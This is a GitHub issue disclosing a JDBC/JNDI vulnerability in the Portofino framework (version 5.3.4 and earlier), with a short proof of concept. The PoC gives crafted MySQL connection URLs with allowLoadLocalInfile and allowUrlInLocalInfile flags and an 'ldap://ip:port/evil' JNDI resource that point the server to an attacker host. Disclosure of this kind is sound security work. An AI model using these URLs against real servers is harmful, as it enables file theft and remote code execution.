Skip to content

Vulnerability: JDBC Deserialization via mysql-connector and JNDI Can Lead to Remote Code Execution (RCE) and Arbitrary File Reads in Portofino ≤ 5.3.4 #754

Description

@R1ckyZ

BUG_Author: R1ckyZ

Affected Version: Portofino ≤ 5.3.4

Vendor: ManyDesigns

Software: Portofino

Vulnerability Files:

  • upstairs/src/main/java/com/manydesigns/portofino/upstairs/actions/database/connections/ConnectionsAction.java

  • portofino-model/src/main/java/com/manydesigns/portofino/model/database/JdbcConnectionProvider.java

  • portofino-model/src/main/java/com/manydesigns/portofino/model/database/JndiConnectionProvider.java

Description:

API /api/portofino-upstairs/database/connections supports custom JDBC and JNDI connections. However, when user-provided parameters are directly used together with existing dependencies, it may lead to Remote Code Execution (RCE) and arbitrary file reads. For instance, JDBC connection attributes such as autoDeserialize, allowLoadLocalInfile, and allowUrlInLocalInfile can enable RCE or unauthorized file access, while JNDI connections may be exploited by pointing to malicious LDAP or RMI endpoints.

Image Image Image

Proof of Concept:

  1. After logging into admin account, access /portofino-upstairs/wizard to create a JDBC or JNDI connection.
Image
  1. Enter the carefully crafted link into the Connection URL or JNDI resource field, then click Next to trigger the createConnection action.
Connection URL: jdbc:mysql://ip:port/test?disableMariaDbDriver=true&allowLoadLocalInfile=true&allowUrlInLocalInfile=true

JNDI resource: ldap://ip:port/evil

Activity

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

      Milestone

      No milestone

      Relationships

      None yet

      Development

      No branches or pull requests

      Issue actions